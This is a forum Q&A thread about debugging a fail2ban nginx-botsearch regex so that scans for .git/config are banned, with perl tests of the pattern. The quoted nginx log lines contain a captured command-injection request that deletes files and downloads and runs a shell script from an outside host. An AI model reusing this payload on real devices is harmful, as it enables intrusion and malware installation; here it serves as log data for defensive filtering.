fail2ban regex fails to match nginx error log
In my fail2ban configuration the filter nginx-botsearch.conf (the one that comes with Ubuntu 22.04.4 LTS) is activated.
Please help me in debugging the behaviour of the regular expression
^ \[error\] \d+#\d+: \*\d+ (\S+ )?\"\S+\" (failed|is not found) \(2\: No such file or directory\), client\: <HOST>\, server\: \S*\, request: \"(GET|POST|HEAD) \/<block> \S+\"\, .*?$

This regexp does catch these log lines:
2024/05/08 13:00:40 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"

2024/05/08 13:00:40 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"

but fails to match this (very similar) line:
2024/05/08 11:55:04 [error] 637#637: *7233 open() "/var/www/html/node01c/new/.git/config" failed (2: No such file or directory), client: 31.7.62.226, server: node-c.myhost.com, request: "GET /new/.git/config HTTP/1.1", host: "20.208.129.142"

Trying to debug it with some online tools does not highlight any particular reason.

Ok I took a look at /etc/fail2ban/filter.d/nginx-botsearch.conf; it uses /etc/fail2ban/filter.d/botsearch-common.conf to import and interpolate the following <block> pattern into the main regex:
\/?(<webmail>|<phpmyadmin>|<wordpress>|cgi-bin|mysqladmin)[^,]*

Such pattern will only allow requests whose path starts with a string matching the <webmail>, <phpmyadmin> or <wordpress> patterns (as well as requests whose path starts with the literal strings cgi-bin and mysqladmin) to go through; your sample discarded request, whose path is not matching any of these conditions (its path starts with new), is being discarded for this reason.
You can change the <block> pattern in /etc/fail2ban/filter.d/botsearch-common.conf like so in order to allow also requests whose path starts with the literal string new to go through:
\/?(<webmail>|<phpmyadmin>|<wordpress>|cgi-bin|mysqladmin|new)[^,]*

% cat input
 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
 [error] 637#637: *7233 open() "/var/www/html/node01c/new/.git/config" failed (2: No such file or directory), client: 31.7.62.226, server: node-c.myhost.com, request: "GET /new/.git/config HTTP/1.1", host: "20.208.129.142"
% perl -ne '/^ \[error\] \d+#\d+: \*\d+ (\S+ )?\"\S+\" (failed|is not found) \(2\: No such file or directory\), client\: \d+\.\d+\.\d+\.\d+\, server\: \S*\, request: \"(GET|POST|HEAD) \/\/?(<webmail>|<phpmyadmin>|<wordpress>|cgi-bin|mysqladmin)[^,]* \S+\"\, .*?$/&&print' input 
 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
% perl -ne '/^ \[error\] \d+#\d+: \*\d+ (\S+ )?\"\S+\" (failed|is not found) \(2\: No such file or directory\), client\: \d+\.\d+\.\d+\.\d+\, server\: \S*\, request: \"(GET|POST|HEAD) \/\/?(<webmail>|<phpmyadmin>|<wordpress>|cgi-bin|mysqladmin|new)[^,]* \S+\"\, .*?$/&&print' input
 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
 [error] 637#637: *7233 open() "/var/www/html/node01c/new/.git/config" failed (2: No such file or directory), client: 31.7.62.226, server: node-c.myhost.com, request: "GET /new/.git/config HTTP/1.1", host: "20.208.129.142"


Thanks for pointing me in the right direction. I simply included .git/ in the search string.

@AlessandroCarini Non c'è di che ;) I'm sure you're very aware of the potential risks of exposing a git repository on a web server and that you're doing it consciously, but I'll still point this out as it's kinda tingling me not to do so:)

No git repository is exposed. I simply use the .git string in the Nginx error log to find IP addresses that try to brute-force access.

@AlessandroCarini Ah I understand!
